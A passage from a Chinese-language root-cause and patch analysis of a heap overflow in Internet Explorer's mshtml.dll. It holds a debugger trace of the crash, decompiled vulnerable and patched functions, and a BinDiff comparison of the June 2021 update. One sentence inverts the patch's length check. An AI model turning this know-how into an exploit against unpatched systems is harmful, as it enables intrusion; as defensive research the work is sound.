pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c2:63a468e2 8b4c2424 mov ecx,dword ptr [esp+24h] ss:002b:0508c7cc=000000030:008:x86> peax=1d02f028 ebx=0508cb38 ecx=00000003 edx=0508c7bc esi=0508ca08 edi=0267ffffeip=63a468e6 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c6:63a468e6 8b54241c mov edx,dword ptr [esp+1Ch] ss:002b:0508c7c4=006800030:008:x86> peax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffffeip=63a468ea esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5ca:63a468ea 57 push edi ; edi,源文本字符串长度,未截断文本长度0:008:x86> peax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffffeip=63a468eb esp=0508c7a4 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cb:63a468eb 50 push eax ; eax,源文本字符串内存地址0:008:x86> peax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffffeip=63a468ec esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cc:63a468ec 8b465c mov eax,dword ptr [esi+5Ch] ds:002b:0508ca64=21d4e0200:008:x86> peax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffffeip=63a468ef esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cf:63a468ef 2bd1 sub edx,ecx ; edx,目的内存大小,截断文本长度0:008:x86> peax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680000 esi=0508ca08 edi=0267ffffeip=63a468f1 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d1:63a468f1 8d0c48 lea ecx,[eax+ecx*2] ; ecx,目的内存地址0:008:x86> peax=21d4e020 ebx=0508cb38 ecx=21d4e026 edx=00680000 esi=0508ca08 edi=0267ffffeip=63a468f4 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d4:63a468f4 e8b8852500 call MSHTML!wmemcpy_s (63c9eeb1)0:008:x86> dd esp l20508c7a0 1d02f028 0267ffff0:008:x86> pInvalid parameter passed to C runtime function.eax=00000022 ebx=0508cb38 ecx=8cccdfa3 edx=00000000 esi=0508ca08 edi=0267ffffeip=63a468f9 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d9:63a468f9 8b4c2418 mov ecx,dword ptr [esp+18h] ss:002b:0508c7b8=04a849f00:008:x86> g(638.ad8): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=21d4e020 ebx=0508cb38 ecx=04aae5c4 edx=02680002 esi=0508ca08 edi=0000fdefeip=63a46809 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:63a46809 66893c50 mov word ptr [eax+edx*2],di ds:002b:26a4e024=???? ; Crash
下面是存在漏洞的函数CSpliceTreeEngine::RemoveSplice()的关键部分代码(逆向所得):
HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this){ ... hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorL, ptpSourceL, 1, 0); if ( hr1 || (hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorR, this->_ptpSourceR, 0, 1)) != 0 ) {LABEL_156: hr = hr1; goto LABEL_157; } if ( this->_ptpSourceR->_pRight != this->_ptpSourceL ) { ... if ( HIBYTE(v179) && (this->field_54 & 4) != 0 ) { ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL); ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR); ptpSourceR = this->_ptpSourceR; fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0; ptpSourceR_to_ptpSourceL_cch = ptpSourceL_cchLeft + ptpSourceR_cchLeft; if ( !fNotText ) { TextLength = CTreeDataPos::GetTextLength(ptpSourceR); ptpSourceR_to_ptpSourceL_cch = TextLength + ptpSourceR_to_ptpSourceL_cch - 1; } LOBYTE(ptpSourceR) = HIBYTE(v179); v11 = cch; } ... if ( ptpSourceR ) { if ( (this->field_54 & 4) != 0 ) { ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL); ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR); ptpSourceR = this->_ptpSourceR; fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0; ptpSourceR_to_ptpSourceL_cch1 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;if ( !fNotText ) { TextLength = CTreeDataPos::GetTextLength(ptpSourceR); ptpSourceR_to_ptpSourceL_cch1 = TextLength + ptpSourceR_to_ptpSourceL_cch1 - 1; } } } ... } ... while ( 1 ) { ptpSourceL = this->_ptpSourceL; if ( (ptpSourceL->_cElemLeftAndFlags & 8) == 0 || ptpSourceL == this->_ptpSourceR )break; ptpSourceL_Right = ptpSourceL->_pRight; if ( (ptpSourceL->dptp.p._dwPointerAndGravityAndCling & 2) != 0 ) Tree::TreeWriter::Remove(ptpSourceL, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst); this->_ptpSourceL = ptpSourceL_Right; } while ( 1 ) { ptpSourceR = this->_ptpSourceR; if ( (ptpSourceR->_cElemLeftAndFlags & 8) == 0 || this->_ptpSourceL == ptpSourceR )break; ptpSourceR_Left = ptpSourceR->_pLeft; if ( (ptpSourceR->dptp.p._dwPointerAndGravityAndCling & 2) != 0 ) Tree::TreeWriter::Remove(ptpSourceR, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst); this->_ptpSourceR = ptpSourceR_Left; } ... if ( (ptpSourceR->_cElemLeftAndFlags & 4) == 0 || ptpSourceR == this->_ptpSourceL || (hr = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchor, ptpSourceR, 1, 1), (hr1 = hr) == 0) ) { ... while ( 1 ) { Cch = 0; if ( HIBYTE(v179) && (this->field_54 & 4) != 0 ) { ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL); ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR); ptpSourceR = this->_ptpSourceR; ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft; fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0; ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft; if ( !fNotText ) { TextLength = CTreeDataPos::GetTextLength(ptpSourceR); ptpSourceR_to_ptpSourceL_cch2 = TextLength + ptpSourceR_to_ptpSourceL_cch2 - 1; } if ( ptpSourceR_to_ptpSourceL_cch > ptpSourceR_to_ptpSourceL_cch1 ) { ... } else { pUndoChRecord = operatornew[](2 * ptpSourceR_to_ptpSourceL_cch2);this->_pUndoChRecord = pUndoChRecord; if ( pUndoChRecord ) { ptpSourceR = this->_ptpSourceR; ptpSourceL = this->_ptpSourceL; for ( ptp = ptpSourceL; ptp != ptpSourceR->_pRight; ptp = ptp->_pRight ) { ptp_cElemLeftAndFlags = ptp->_cElemLeftAndFlags; if ( (ptp_cElemLeftAndFlags & 4) != 0 ) { pText = Tree::TextData::GetText(ptp->_pTextData, 0, &TextLen); wmemcpy_s(&this->_pUndoChRecord[Cch], ptpSourceR_to_ptpSourceL_cch2 - Cch, pText, TextLen); Cch += TextLen; } elseif ( (ptp_cElemLeftAndFlags & 3) != 0 && (ptp_cElemLeftAndFlags & 0x40) != 0 ) { this->_pUndoChRecord[Cch++] = 0xFDEF; } } } else { ... } } } ... } ... } ...}
造成堆越界写的根本原因是,用于标识文本字符串在DOM树/DOM流中的位置的CTreeDataPos类对象中有两个结构用于记录文本字符串的长度,一个是结构体DATAPOSTEXT的_cch成员(25bit),一个是Tree::TextData对象中的_cch成员(32bit)。由于它们的大小不同,当文本字符串的长度超过25bit能够表示的长度后,在向结构体DATAPOSTEXT的_cch成员赋值时,会造成其存储的是截断后的长度。之后调用CSpliceTreeEngine::RemoveSplice()函数删除文本字符串在DOM树/DOM流的结构时,会使用CTreePos::GetCp()函数获得要删除的DOM树/DOM流结构所占用的字符数(包含截断的文本字符串长度),并用其申请一段内存。然后,调用Tree::TextData::GetText()函数获得Tree::TextData对象中的_cch成员中存储的未截断文本字符串长度,并用其作为索引,对前面申请的内存进行赋值操作,从而造成了堆越界写漏洞。
漏洞修复
分析此漏洞时,使用的环境是Windows 10 1809 Pro x64。在此漏洞的MSRC公告页面,可以找到当前环境该漏洞的补丁号为KB5003646。在补丁详情页面,我们可以知道此补丁只适用于LTSC版本。当前环境,此补丁无法安装成功。所以我使用Windows 10 Enterprise LTSC 2019环境来进行补丁安装并进行补丁分析。我用的是2019年03月发布的Windows 10 Enterprise LTSC 2019,成功安装此漏洞补丁需要先安装2021年5月11日之后发布的服务堆栈更新(SSU),这里安装的是KB5003711,安装完之后再安装此漏洞的补丁KB5003646,就可以成功安装。
由于KB5003646补丁是2021年6月8日发布的一个累计更新,如果补丁分析时所用的两个漏洞模块文件是两个更新时间相差较大的环境提取出来的,会造成不好定位补丁位置。所以我们需要知道2021年5月发布的累计更新补丁编号。这可以通过KB5003646在Microsoft更新目录详情页面的信息得到。
以下是KB5003171和KB5003646补丁对应的mshtml.dll的版本号:
补丁编号 | mshtml.dll版本号 |
---|
KB5003171 | 11.0.17763.1911 |
KB5003646 | 11.0.17763.1999 |
接下来我们将这两个补丁环境的mshtml.dll提取出来,使用IDA打开并生成IDB文件,再使用BinDiff进行补丁比较。不同的IDA版本和不同的BinDiff版本可能会出现不兼容的情况,我这里使用的是IDA Pro7.5+BinDiff6。分析完成后,得到如下结果:
根据前面的根本原因分析,我们可以知道此漏洞是和文本字符串相关的。再来看BinDiff分析出来的结果,存在差异的函数中只有Tree::TreeWriter::NewTextPosInternal()和CTreeDataPos::GetPlainTextLength()是与文本字符串有关的。通过IDA静态分析这两个函数后,可以确定补丁位置位于Tree::TreeWriter::NewTextPosInternal()函数中。因为CTreeDataPos::GetPlainTextLength()函数中调用了Tree::TextData::GetText()函数,从之前给出的逆向出的Tree::TextData::GetText()函数代码可知,Tree::TextData::GetText()函数是从Tree::TextData对象获取文本字符串的指针和长度的。Tree::TextData对象中的_cch用于存储文本字符串的长度,它的长度为32bit。而CTreeDataPos对象中结构体DATAPOSTEXT的_cch成员也是用于存储文本字符串的长度,它的长度为25bit。如果字符串长度超过了25bit所能表示的范围,在向结构体DATAPOSTEXT的_cch成员存入字符串长度时,就会造成截断。补丁代码应该是在向结构体DATAPOSTEXT的_cch成员写入文本字符串长度时,对文本字符串的长度进行判断。所以补丁位置并不在CTreeDataPos::GetPlainTextLength()函数中。
下图为Tree::TreeWriter::NewTextPosInternal()函数中添加的补丁代码:
如下是,经过处理的补丁前后Tree::TreeWriter::NewTextPosInternal()函数的IDA反编译代码:
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, constwchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9){ CTreeDataPos *pTreeDataPos; pTreeDataPos = *ppTreeDataPos; pTreeDataPos->_cElemLeftAndFlags = pTreeDataPos->_cElemLeftAndFlags & 0xFFFFFFF4 | 4; if ( a9 ) pTreeDataPos->dptp.t._lTextID |= 0x20000000u; pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25); if ( eHLM < 80000 ) pTreeDataPos->dptp.t._lTextID = lTextID; else pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF; pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3; CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);}void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, constwchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9){ CTreeDataPos *pTreeDataPos; pTreeDataPos = *ppTreeDataPos; (*ppTreeDataPos)->_cElemLeftAndFlags = (*ppTreeDataPos)->_cElemLeftAndFlags & 0xFFFFFFF4 | 4; if ( a9 ) pTreeDataPos->dptp.t._lTextID |= 0x20000000u; if ( (unsigned __int8)wil::Feature<__WilFeatureTraits_Feature_Servicing_2106b_33613045>::__private_IsEnabled() ) Release_Assert((int)SrcTextCch < 0x2000000); pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25); if ( eHLM >= 80000 ) pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF; else pTreeDataPos->dptp.t._lTextID = lTextID; pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3; CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);}void __fastcall Release_Assert(bool a1){ if ( !a1 ) Abandonment::AssertionFailed(); }void __stdcall Abandonment::AssertionFailed(){ void *retaddr; Abandonment::InduceAbandonment(10, retaddr, 0, 0); __debugbreak();}void __thiscall Abandonment::InduceAbandonment(void *this, int a2, int a3){ Abandonment::hostExceptionFilter = SetUnhandledExceptionFilter(0); RaiseException(0x80000003, 1u, this, 0);}
可以看到打了补丁后的Tree::TreeWriter::NewTextPosInternal()函数在向CTreeDataPos对象中结构体DATAPOSTEXT的_cch成员写入文本字符串长度之前,进行了一个判断。如果SrcTextCch < 0x2000000,就会触发断言失败。普通断言(assert())只有在debug版本的文件中会得到执行,而在release版本的文件中不会得到执行。这里使用的是一种由C++提供的,可以添加到release版本的文件中的断言函数Release_Assert()。断言失败后,通过SetUnhandledExceptionFilter()函数设置异常处理函数,并会抛出一个断点异常。之后会一直在异常处理流程中,并不会造成IE执行堆越界写的代码。